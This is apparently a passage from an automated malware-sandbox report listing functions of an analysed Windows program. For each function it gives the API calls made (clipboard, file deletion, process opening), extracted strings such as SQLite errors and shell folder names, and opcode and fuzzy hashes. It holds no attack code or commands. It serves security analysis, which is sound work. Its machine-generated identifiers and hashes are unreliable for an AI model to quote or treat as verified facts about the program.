                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                • memset.MSVCRT ref: 00413A00
                                • memcpy.MSVCRT ref: 00413A1B
                                • wcscat.MSVCRT ref: 00413A27
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                • String ID: \systemroot
                                • API String ID: 4173585201-1821301763
                                • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004098E2, Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • EmptyClipboard.USER32 ref: 004098EC
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                • GlobalFix.KERNEL32(00000000), ref: 00409927
                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                • GetLastError.KERNEL32 ref: 0040995D
                                • CloseHandle.KERNEL32(?), ref: 00409969
                                • GetLastError.KERNEL32 ref: 00409974
                                • CloseClipboard.USER32 ref: 0040997D
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                • String ID:
                                • API String ID: 2565263379-0
                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414BB0, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: wcscpy
                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                • API String ID: 1284135714-318151290
                                • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D2AB, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                • String ID: 0$6
                                • API String ID: 4066108131-3849865405
                                • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004082C7, Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 004082EF
                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                • memset.MSVCRT ref: 00408362
                                • memset.MSVCRT ref: 00408377
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$ByteCharMultiWide
                                • String ID:
                                • API String ID: 290601579-0
                                • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00444E84, Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$memchrmemset
                                • String ID: PD$PD
                                • API String ID: 1581201632-2312785699
                                • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409F42, Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                Download Yara Rule
                                APIs
                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                • GetDC.USER32(00000000), ref: 00409F6E
                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                • GetParent.USER32(?), ref: 00409FA5
                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                • String ID:
                                • API String ID: 2163313125-0
                                • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004028E7, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@$wcslen
                                • String ID:
                                • API String ID: 239872665-3916222277
                                • Opcode ID: eed80f1a4394893a03f990825ec893275bd5f1eb008c7065aa391847727c8119
                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                • Opcode Fuzzy Hash: eed80f1a4394893a03f990825ec893275bd5f1eb008c7065aa391847727c8119
                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E175, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                • memset.MSVCRT ref: 0040E1BD
                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                • _snwprintf.MSVCRT ref: 0040E257
                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                • API String ID: 3883404497-2982631422
                                • Opcode ID: 1a3e8d40e4f1bd73383ec4b997ec288261575c612b7aed62b1ad527d03012e7d
                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                • Opcode Fuzzy Hash: 1a3e8d40e4f1bd73383ec4b997ec288261575c612b7aed62b1ad527d03012e7d
                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A45A, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpywcslen$_snwprintfmemset
                                • String ID: %s (%s)$YV@
                                • API String ID: 3979103747-598926743
                                • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A661, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                • wcslen.MSVCRT ref: 0040A6B1
                                • wcscpy.MSVCRT ref: 0040A6C1
                                • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                • wcscpy.MSVCRT ref: 0040A6DB
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                • String ID: Unknown Error$netmsg.dll
                                • API String ID: 2767993716-572158859
                                • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040DAE1, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                • wcscpy.MSVCRT ref: 0040DAFB
                                • wcscpy.MSVCRT ref: 0040DB0B
                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                • API String ID: 3176057301-2039793938
                                • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0042F5F4, Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • unable to open database: %s, xrefs: 0042F84E
                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                • database %s is already in use, xrefs: 0042F6C5
                                • database is already attached, xrefs: 0042F721
                                • out of memory, xrefs: 0042F865
                                • too many attached databases - max %d, xrefs: 0042F64D
                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpymemset
                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                • API String ID: 1297977491-2001300268
                                • Opcode ID: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                • Opcode Fuzzy Hash: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040EAFF, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                • memcpy.MSVCRT ref: 0040EB80
                                • memcpy.MSVCRT ref: 0040EB94
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                • String ID: ($d
                                • API String ID: 1140211610-1915259565
                                • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00417887, Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                Download Yara Rule
                                APIs
                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                • GetLastError.KERNEL32 ref: 004178FB
                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File$ErrorLastLockSleepUnlock
                                • String ID:
                                • API String ID: 3015003838-0
                                • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407E1E, Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00407E44
                                • memset.MSVCRT ref: 00407E5B
                                • _mbscpy.MSVCRT ref: 00407E7E
                                • _mbscpy.MSVCRT ref: 00407ED7
                                • _mbscpy.MSVCRT ref: 00407EEE
                                • _mbscpy.MSVCRT ref: 00407F01
                                • wcscpy.MSVCRT ref: 00407F10
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                • String ID:
                                • API String ID: 59245283-0
                                • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041851E, Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                • GetLastError.KERNEL32 ref: 0041855C
                                • Sleep.KERNEL32(00000064), ref: 00418571
                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                • GetLastError.KERNEL32 ref: 0041858E
                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                • String ID:
                                • API String ID: 3467550082-0
                                • Opcode ID: 56e4a7d77988e94444627618330347d92b7c0f18510b370ca22fa361cd1098af
                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                • Opcode Fuzzy Hash: 56e4a7d77988e94444627618330347d92b7c0f18510b370ca22fa361cd1098af
                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414E7F, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy
                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                • API String ID: 3510742995-3273207271
                                • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413A3F, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                • memset.MSVCRT ref: 00413ADC
                                • memset.MSVCRT ref: 00413AEC
                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                • memset.MSVCRT ref: 00413BD7
                                • wcscpy.MSVCRT ref: 00413BF8
                                • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                • String ID: 3A
